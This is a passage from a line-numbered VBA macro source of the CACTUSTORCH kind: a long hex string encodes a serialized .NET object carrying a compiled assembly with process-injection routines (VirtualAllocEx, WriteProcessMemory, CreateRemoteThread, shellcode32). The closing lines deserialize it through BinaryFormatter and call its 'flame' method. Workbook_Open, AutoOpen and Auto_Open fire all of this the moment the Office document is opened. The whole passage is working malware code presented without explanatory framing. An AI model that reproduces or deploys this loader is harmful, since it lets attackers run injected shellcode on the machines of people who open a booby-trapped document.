"6D6574686F644E616D650D64656C6567617465456E747279010102010101033053797374656D2E44656C6567617465536572" 83 | serialized_obj = serialized_obj & "69616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374656D2E52756E74696D65" 84 | serialized_obj = serialized_obj & "2E52656D6F74696E672E4D6573736167696E672E48656164657248616E646C657206060000004B6D73636F726C69622C2056" 85 | serialized_obj = serialized_obj & "657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237" 86 | serialized_obj = serialized_obj & "376135633536313933346530383906070000000774617267657430090600000006090000000F53797374656D2E44656C6567" 87 | serialized_obj = serialized_obj & "617465060A0000000D44796E616D6963496E766F6B650A04030000002253797374656D2E44656C656761746553657269616C" 88 | serialized_obj = serialized_obj & "697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300307033053797374" 89 | serialized_obj = serialized_obj & "656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E747279022F53797374" 90 | serialized_obj = serialized_obj & "656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C646572090B000000090C" 91 | serialized_obj = serialized_obj & "000000090D00000004040000002F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A" 92 | serialized_obj = serialized_obj & "6174696F6E486F6C64657206000000044E616D650C417373656D626C794E616D6509436C6173734E616D65095369676E6174" 93 | serialized_obj = serialized_obj & "7572650A4D656D626572547970651047656E65726963417267756D656E7473010101010003080D53797374656D2E54797065" 94 | serialized_obj = serialized_obj & "5B5D090A0000000906000000090900000006110000002C53797374656D2E4F626A6563742044796E616D6963496E766F6B65" 95 | serialized_obj = serialized_obj & "2853797374656D2E4F626A6563745B5D29080000000A010B0000000200000006120000002053797374656D2E586D6C2E5363" 96 | serialized_obj = serialized_obj & "68656D612E586D6C56616C756547657474657206130000004D53797374656D2E586D6C2C2056657273696F6E3D322E302E30" 97 | serialized_obj = serialized_obj & "2E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237376135633536313933346530" 98 | serialized_obj = serialized_obj & "383906140000000774617267657430090600000006160000001A53797374656D2E5265666C656374696F6E2E417373656D62" 99 | serialized_obj = serialized_obj & "6C790617000000044C6F61640A0F0C000000001E0000024D5A90000300000004000000FFFF0000B800000000000000400000" 100 | serialized_obj = serialized_obj & "000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD" 101 | serialized_obj = serialized_obj & "21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000" 102 | serialized_obj = serialized_obj & "00504500004C0103005886A25A0000000000000000E00022200B013000001600000006000000000000EE3500000020000000" 103 | serialized_obj = serialized_obj & "4000000000001000200000000200000400000000000000040000000000000000800000000200000000000003004085000010" 104 | serialized_obj = serialized_obj & "00001000000000100000100000000000001000000000000000000000009C3500004F00000000400000900300000000000000" 105 | serialized_obj = serialized_obj & "0000000000000000000000006000000C00000000000000000000000000000000000000000000000000000000000000000000" 106 | serialized_obj = serialized_obj & "000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E" 107 | serialized_obj = serialized_obj & "74657874000000F4150000002000000016000000020000000000000000000000000000200000602E72737263000000900300" 108 | serialized_obj = serialized_obj & "00004000000004000000180000000000000000000000000000400000402E72656C6F6300000C000000006000000002000000" 109 | serialized_obj = serialized_obj & "1C00000000000000000000000000004000004200000000000000000000000000000000D03500000000000048000000020005" 110 | serialized_obj = serialized_obj & "000C220000901300000100000000000000000000000000000000000000000000000000000000000000000000000000000000" 111 | serialized_obj = serialized_obj & "0000000000000000000000000000001E02280F00000A2A13300A001C0100000100001104281000000A0A1201068E69281100" 112 | serialized_obj = serialized_obj & "000A730A0000060C08167D35000004720100007013047203000070281200000A6F1300000A163119721D000070281200000A" 113 | serialized_obj = serialized_obj & "722B00007003281400000A13042B17721D000070281200000A724100007003281400000A13041104141414171A7E1500000A" 114 | serialized_obj = serialized_obj & "14081203280100000626097B0400000413051205281600000A7257000070281700000A3980000000110516731100000A0720" 115 | serialized_obj = serialized_obj & "003000001A280200000613061206281600000A7257000070281800000A2C0A1105162805000006262A1613071208068E6928" 116 | serialized_obj = serialized_obj & "1100000A11051106061108110728040000062611051106071F2016731100000A280300000626110516731100000A16110616" 117 | serialized_obj = serialized_obj & "731100000A1616731100000A2806000006262A7A027E1500000A7D0200000402280F00000A0202281900000A7D010000042A" 118 | serialized_obj = serialized_obj & "00133002006000000000000000027E1500000A7D2B000004027E1500000A7D2C000004027E1500000A7D2D000004027E1500" 119 | serialized_obj = serialized_obj & "000A7D38000004027E1500000A7D39000004027E1500000A7D3A000004027E1500000A7D3B00000402280F00000A02022819" 120 | serialized_obj = serialized_obj & "00000A7D2A0000042A42534A4201000100000000000C00000076322E302E35303732370000000005006C0000005C07000023" 121 | serialized_obj = serialized_obj & "7E0000C80700007409000023537472696E6773000000003C1100005C00000023555300981100001000000023475549440000" 122 | serialized_obj = serialized_obj & "00A8110000E801000023426C6F620000000000000002000001571D02140902000000FA013300160000010000001700000009" 123 | serialized_obj = serialized_obj & "000000500000000A000000240000001900000033000000120000000100000001000000060000000100000001000000070000" 124 | serialized_obj = serialized_obj & "000000990601000000000006005C0592070600C905920706008A0460070F00B20700000600B204E10606003005E106060011" 125 | serialized_obj = serialized_obj & "05E1060600B005E10606007C05E10606009505E1060600C904E10606009E04730706007C0473070600F404E1060600AB08A9" 126 | serialized_obj = serialized_obj & "0606006104A90606004D05A9060600B006A9060600E408A90606005907A9060600D808A90606006606A90606008406730700" 127 | serialized_obj = serialized_obj & "00000025000000000001000100010010006D0600003D00010001000A001000F80700003D00010009000A011000CE06000041" 128 | serialized_obj = serialized_obj & "0004000A00020100001B080000490008000A000201000036080000490027000A000A001000060700003D002A000A00020100" 129 | serialized_obj = serialized_obj & "006D04000049003C000B0002010000F3060000490045000B0006007D06FA00060044073F0006002404FD00060074083F0006" 130 | serialized_obj = serialized_obj & "00E7033F000600C803FA000600BD03FA0006069E0300015680B20203015680C00203015680640003015680880203015680C2" 131 | serialized_obj = serialized_obj & "0003015680530203015680F101030156801D0203015680050203015680A001030156800203030156805E0103015680480103" 132 | serialized_obj = serialized_obj & "015680E101030156804D02030156803102030156806A03030156808203030156809902030156801D03030156807601030156" 133 | serialized_obj = serialized_obj & "807500030156803D0003015680270103015680A800030156803A0303015680B90103015680180103015680C60103015680E5" 134 | serialized_obj = serialized_obj & "02030106069E0300015680910007015680720207010600A603FA000600EF033F00060017073F00060033043F0006004B03FA" 135 | serialized_obj = serialized_obj & "0006009A03FA000600E705FA000600EF05FA0006004708FA0006005508FA000600E404FA0006002E08FA00060001090B0106" 136 | serialized_obj = serialized_obj & "000D000B01060019003F000600EC083F000600F6083F00060034073F0006069E0300015680DE020E015680EF000E0156809D" 137 | serialized_obj = serialized_obj & "010E015680D8020E015680D5010E0156800F010E01568094010E01568003010E0106069E0300015680E70012015680570012" 138 | serialized_obj = serialized_obj & "015680D500120156805803120156806902120156804F0312015680DD00120156806003120156801106120156802406120156" 139 | serialized_obj = serialized_obj & "803906120100000000800096202E001601010000000000800096200D092A010B0000000000800096201C0935011000000000" 140 | serialized_obj = serialized_obj & "008000962034093F0115000000000080009620630849011A000000000080009120D4034F011C0050200000000086183E0706" 141 | serialized_obj = serialized_obj & "00230058200000000086004D045A01230080210000000086183E0706002500A0210000000086183E0706002500000001003B" 142 | serialized_obj = serialized_obj & "0400000200530400000300E40700000400D10700000500C107000006000B0800000700D60800000800470901000900040702" 143 | serialized_obj = serialized_obj & "000A00CC06000001001B04000002008B08000003000306000004006B0400000500BF08000001001B04000002008B08000003" 144 | serialized_obj = serialized_obj & "00030600000400C90800000500B208000001007408000002007D0800000300210700000400030600000500B5060000010074" 145 | serialized_obj = serialized_obj & "0800000200FA0300000100740800000200D10700000300F705000004009508000005002807000006000B0800000700B20300" 146 | serialized_obj = serialized_obj & "0001002D0900000200010009003E07010011003E07060019003E070A0029003E07100031003E07100039003E07100041003E" 147 | serialized_obj = serialized_obj & "07100049003E07100051003E07100059003E07100061003E07150069003E07100071003E07100089003E07060079003E0706" 148 | serialized_obj = serialized_obj & "00990053062900A1003E070100A90004042F00B10079063400B100A4083800A10012073F00A10064064200B10066094600B1" 149 | serialized_obj = serialized_obj & "005A094600B9000A064C00090024005A00090028005F0009002C006400090030006900090034006E0009003800730009003C" 150 | serialized_obj = serialized_obj & "007800090040007D0009004400820009004800870009004C008C00090050009100090054009600090058009B0009005C00A0" 151 | serialized_obj = serialized_obj & "0009006000A50009006400AA0009006800AF0009006C00B40009007000B90009007400BE0009007800C30009007C00C80009" 152 | serialized_obj = serialized_obj & "008000CD0009008400D20009008800D70009008C00DC0009009000E10009009400E60009009800EB000900A0005A000900A4" 153 | serialized_obj = serialized_obj & "005F000900F40096000900F8009B000900FC00F00009000001B90009000401E10009000801F50009000C01BE0009001001C3" 154 | serialized_obj = serialized_obj & "00090018016E0009001C017300090020017800090024017D00090028015A0009002C015F0009003001640009003401690009" 155 | serialized_obj = serialized_obj & "003801820009003C018700090040018C002E000B0060012E00130069012E001B0088012E00230091012E002B0091012E0033" 156 | serialized_obj = serialized_obj & "00A2012E003B00A2012E00430091012E004B0091012E005300A2012E005B00A8012E006300AE012E006B00D80143005B00A8" 157 | serialized_obj = serialized_obj & "01A30073005A00C30073005A00030173005A00230173005A001A008C06000103002E000100000105000D090100000107001C" 158 | serialized_obj = serialized_obj & "090100000109003409010000010B006308010000010D00D4030100048000000100000000000000000000000000F700000002" 159 | serialized_obj = serialized_obj & "00000000000000000000005100A9030000000003000200040002000500020006000200070002000800020009000200000000" 160 | serialized_obj = serialized_obj & "00007368656C6C636F64653332006362526573657276656432006C70526573657276656432003C4D6F64756C653E00437265" 161 | serialized_obj = serialized_obj & "61746550726F6365737341004352454154455F425245414B415741595F46524F4D5F4A4F4200455845435554455F52454144" 162 | serialized_obj = serialized_obj & "004352454154455F53555350454E4445440050524F434553535F4D4F44455F4241434B47524F554E445F454E44004455504C" 163 | serialized_obj = serialized_obj & "49434154455F434C4F53455F534F55524345004352454154455F44454641554C545F4552524F525F4D4F4445004352454154" 164 | serialized_obj = serialized_obj & "455F4E45575F434F4E534F4C4500455845435554455F52454144575249544500455845435554450052455345525645004341" 165 | serialized_obj = serialized_obj & "43545553544F5243480057524954455F574154434800504859534943414C0050524F46494C455F4B45524E454C0043524541" 166 | serialized_obj = serialized_obj & "54455F50524553455256455F434F44455F415554485A5F4C4556454C004352454154455F5348415245445F574F575F56444D" 167 | serialized_obj = serialized_obj & "004352454154455F53455041524154455F574F575F56444D0050524F434553535F4D4F44455F4241434B47524F554E445F42" 168 | serialized_obj = serialized_obj & "4547494E00544F505F444F574E00474F004352454154455F4E45575F50524F434553535F47524F55500050524F46494C455F" 169 | serialized_obj = serialized_obj & "555345520050524F46494C455F534552564552004C415247455F5041474553004352454154455F464F524345444F53004944" 170 | serialized_obj = serialized_obj & "4C455F5052494F524954595F434C415353005245414C54494D455F5052494F524954595F434C41535300484947485F505249" 171 | serialized_obj = serialized_obj & "4F524954595F434C4153530041424F56455F4E4F524D414C5F5052494F524954595F434C4153530042454C4F575F4E4F524D" 172 | serialized_obj = serialized_obj & "414C5F5052494F524954595F434C415353004E4F414343455353004455504C49434154455F53414D455F4143434553530044" 173 | serialized_obj = serialized_obj & "455441434845445F50524F43455353004352454154455F50524F5445435445445F50524F434553530044454255475F50524F" 174 | serialized_obj = serialized_obj & "434553530044454255475F4F4E4C595F544849535F50524F4345535300524553455400434F4D4D4954004352454154455F49" 175 | serialized_obj = serialized_obj & "474E4F52455F53595354454D5F44454641554C54004352454154455F554E49434F44455F454E5649524F4E4D454E54004558" 176 | serialized_obj = serialized_obj & "54454E4445445F53544152545550494E464F5F50524553454E54004352454154455F4E4F5F57494E444F5700647758005245" 177 | serialized_obj = serialized_obj & "41444F4E4C5900455845435554455F5752495445434F505900494E48455249545F504152454E545F414646494E4954590049" 178 | serialized_obj = serialized_obj & "4E48455249545F43414C4C45525F5052494F52495459006477590076616C75655F5F006362006D73636F726C6962006C7054" 179 | serialized_obj = serialized_obj & "68726561644964006477546872656164496400647750726F6365737349640043726561746552656D6F746554687265616400" 180 | serialized_obj = serialized_obj & "68546872656164006C705265736572766564007545786974436F646500476574456E7669726F6E6D656E745661726961626C" 181 | serialized_obj = serialized_obj & "65006C7048616E646C650062496E686572697448616E646C65006C705469746C65006C704170706C69636174696F6E4E616D" 182 | serialized_obj = serialized_obj & "6500666C616D65006C70436F6D6D616E644C696E650056616C75655479706500666C416C6C6F636174696F6E547970650047" 183 | serialized_obj = serialized_obj & "7569644174747269627574650044656275676761626C6541747472696275746500436F6D56697369626C6541747472696275" 184 | serialized_obj = serialized_obj & "746500417373656D626C795469746C6541747472696275746500417373656D626C7954726164656D61726B41747472696275" 185 | serialized_obj = serialized_obj & "746500647746696C6C41747472696275746500417373656D626C7946696C6556657273696F6E417474726962757465004173" 186 | serialized_obj = serialized_obj & "73656D626C79436F6E66696775726174696F6E41747472696275746500417373656D626C794465736372697074696F6E4174" 187 | serialized_obj = serialized_obj & "7472696275746500466C61677341747472696275746500436F6D70696C6174696F6E52656C61786174696F6E734174747269" 188 | serialized_obj = serialized_obj & "6275746500417373656D626C7950726F6475637441747472696275746500417373656D626C79436F70797269676874417474" 189 | serialized_obj = serialized_obj & "72696275746500417373656D626C79436F6D70616E794174747269627574650052756E74696D65436F6D7061746962696C69" 190 | serialized_obj = serialized_obj & "74794174747269627574650064775853697A650064775953697A65006477537461636B53697A6500647753697A650053697A" 191 | serialized_obj = serialized_obj & "654F660047554152445F4D6F646966696572666C6167004E4F43414348455F4D6F646966696572666C616700575249544543" 192 | serialized_obj = serialized_obj & "4F4D42494E455F4D6F646966696572666C61670046726F6D426173653634537472696E6700546F537472696E670063616374" 193 | serialized_obj = serialized_obj & "7573546F726368006765745F4C656E677468004D61727368616C006B65726E656C33322E646C6C00434143545553544F5243" 194 | serialized_obj = serialized_obj & "482E646C6C0053797374656D00456E756D006C704E756D6265724F6642797465735772697474656E006C7050726F63657373" 195 | serialized_obj = serialized_obj & "496E666F726D6174696F6E0053797374656D2E5265666C656374696F6E004D656D6F727950726F74656374696F6E006C7053" 196 | serialized_obj = serialized_obj & "746172747570496E666F005A65726F006C704465736B746F7000627566666572006C70506172616D65746572006853746445" 197 | serialized_obj = serialized_obj & "72726F72002E63746F72006C70536563757269747944657363726970746F7200496E745074720053797374656D2E44696167" 198 | serialized_obj = serialized_obj & "6E6F73746963730053797374656D2E52756E74696D652E496E7465726F7053657276696365730053797374656D2E52756E74" 199 | serialized_obj = serialized_obj & "696D652E436F6D70696C6572536572766963657300446562756767696E674D6F6465730062496E686572697448616E646C65" 200 | serialized_obj = serialized_obj & "73006C7054687265616441747472696275746573006C7050726F636573734174747269627574657300536563757269747941" 201 | serialized_obj = serialized_obj & "7474726962757465730064774372656174696F6E466C6167730043726561746550726F63657373466C616773006477466C61" 202 | serialized_obj = serialized_obj & "6773004475706C69636174654F7074696F6E7300647758436F756E74436861727300647759436F756E744368617273005465" 203 | serialized_obj = serialized_obj & "726D696E61746550726F63657373006850726F63657373006C704261736541646472657373006C7041646472657373006C70" 204 | serialized_obj = serialized_obj & "53746172744164647265737300436F6E636174004F626A65637400666C4F6C6450726F7465637400666C50726F7465637400" 205 | serialized_obj = serialized_obj & "666C4E657750726F74656374006C70456E7669726F6E6D656E7400436F6E766572740068537464496E70757400685374644F" 206 | serialized_obj = serialized_obj & "7574707574007753686F7757696E646F77005669727475616C416C6C6F634578005669727475616C50726F74656374457800" 207 | serialized_obj = serialized_obj & "62696E61727900577269746550726F636573734D656D6F7279006C7043757272656E744469726563746F7279006F705F4571" 208 | serialized_obj = serialized_obj & "75616C697479006F705F496E657175616C6974790000010019500072006F006700720061006D005700360034003300320000" 209 | serialized_obj = serialized_obj & "0D770069006E0064006900720000155C0053007900730057004F005700360034005C0000155C00530079007300740065006D" 210 | serialized_obj = serialized_obj & "00330032005C000003300000001662F14473FD1A4190700B9987CFFABE00042001010803200001052001011111042001010E" 211 | serialized_obj = serialized_obj & "04200101020E07091D0518121C11100E181808180500011D050E0400010E0E032000080600030E0E0E0E0206180320000E05" 212 | serialized_obj = serialized_obj & "0002020E0E040001081C08B77A5C561934E08904010000000402000000040400000004080000000410000000042000000004" 213 | serialized_obj = serialized_obj & "4000000004800000000400010000040002000004000400000400080000040010000004002000000400400000040080000004" 214 | serialized_obj = serialized_obj & "0000010004000002000400000400040000080004000010000400002000040000000104000000020400000004040000000804" 215 | serialized_obj = serialized_obj & "0000001004000000200400000040040000008004003000000400004000020608020602020609030611140306111802060603" 216 | serialized_obj = serialized_obj & "0611200306112413000A180E0E120C120C021114180E121C1011100A00051818181811201124090005181818181124180900" 217 | serialized_obj = serialized_obj & "050218181D0518080500020218090A00071818180918180918052002010E0E0801000800000000001E010001005402165772" 218 | serialized_obj = serialized_obj & "61704E6F6E457863657074696F6E5468726F7773010801000200000000001001000B434143545553544F5243480000050100" 219 | serialized_obj = serialized_obj & "0000000501000100002901002435363539386631632D366438382D343939342D613339322D61663333376162653537373700" 220 | serialized_obj = serialized_obj & "000C010007312E302E302E300000000000C43500000000000000000000DE3500000020000000000000000000000000000000" 221 | serialized_obj = serialized_obj & "00000000000000D0350000000000000000000000005F436F72446C6C4D61696E006D73636F7265652E646C6C0000000000FF" 222 | serialized_obj = serialized_obj & "2500200010000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000" 223 | serialized_obj = serialized_obj & "0000000000010001000000300000800000000000000000000000000000010000000000480000005840000034030000000000" 224 | serialized_obj = serialized_obj & "0000000000340334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE00" 225 | serialized_obj = serialized_obj & "000100000001000000000000000100000000003F000000000000000400000002000000000000000000000000000000440000" 226 | serialized_obj = serialized_obj & "000100560061007200460069006C00650049006E0066006F00000000002400040000005400720061006E0073006C00610074" 227 | serialized_obj = serialized_obj & "0069006F006E00000000000000B00494020000010053007400720069006E006700460069006C00650049006E0066006F0000" 228 | serialized_obj = serialized_obj & "0070020000010030003000300030003000340062003000000030000C00010043006F006D006D0065006E0074007300000043" 229 | serialized_obj = serialized_obj & "004100430054005500530054004F00520043004800000022000100010043006F006D00700061006E0079004E0061006D0065" 230 | serialized_obj = serialized_obj & "00000000000000000040000C000100460069006C0065004400650073006300720069007000740069006F006E000000000043" 231 | serialized_obj = serialized_obj & "004100430054005500530054004F005200430048000000300008000100460069006C006500560065007200730069006F006E" 232 | serialized_obj = serialized_obj & "000000000031002E0030002E0030002E003000000040001000010049006E007400650072006E0061006C004E0061006D0065" 233 | serialized_obj = serialized_obj & "00000043004100430054005500530054004F005200430048002E0064006C006C0000003C000C0001004C006500670061006C" 234 | serialized_obj = serialized_obj & "0043006F007000790072006900670068007400000043004100430054005500530054004F0052004300480000002A00010001" 235 | serialized_obj = serialized_obj & "004C006500670061006C00540072006100640065006D00610072006B00730000000000000000004800100001004F00720069" 236 | serialized_obj = serialized_obj & "00670069006E0061006C00460069006C0065006E0061006D006500000043004100430054005500530054004F005200430048" 237 | serialized_obj = serialized_obj & "002E0064006C006C00000038000C000100500072006F0064007500630074004E0061006D0065000000000043004100430054" 238 | serialized_obj = serialized_obj & "005500530054004F005200430048000000340008000100500072006F006400750063007400560065007200730069006F006E" 239 | serialized_obj = serialized_obj & "00000031002E0030002E0030002E003000000038000800010041007300730065006D0062006C007900200056006500720073" 240 | serialized_obj = serialized_obj & "0069006F006E00000031002E0030002E0030002E003000000000000000000000000000000000000000000000000000000000" 241 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 242 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000003000000C000000F0" 243 | serialized_obj = serialized_obj & "3500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 244 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 245 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 246 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 247 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 248 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 249 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 250 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 251 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 252 | serialized_obj = serialized_obj & "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 253 | serialized_obj = serialized_obj & "000000010D00000004000000091700000009060000000916000000061A0000002753797374656D2E5265666C656374696F6E" 254 | serialized_obj = serialized_obj & "2E417373656D626C79204C6F616428427974655B5D29080000000A0B" 255 | 256 | entry_class = "cactusTorch" 257 | 258 | Dim stm As Object, fmt As Object, al As Object 259 | Set stm = CreateObject("System.IO.MemoryStream") 260 | Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter") 261 | Set al = CreateObject("System.Collections.ArrayList") 262 | 263 | Dim dec 264 | dec = decodeHex(serialized_obj) 265 | 266 | For Each i In dec 267 | stm.WriteByte i 268 | Next i 269 | 270 | stm.Position = 0 271 | 272 | Dim n As Object, d As Object, o As Object 273 | Set n = fmt.SurrogateSelector 274 | Set d = fmt.Deserialize_2(stm) 275 | al.Add n 276 | 277 | Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class) 278 | o.flame binary,code 279 | End Function 280 | 281 | Sub Workbook_Open() 282 | Init 283 | Run 284 | End Sub 285 | 286 | Sub AutoOpen() 287 | Init 288 | Run 289 | End Sub 290 | 291 | Sub Auto_Open() 292 | AutoOpen 293 | End Sub 294 | --------------------------------------------------------------------------------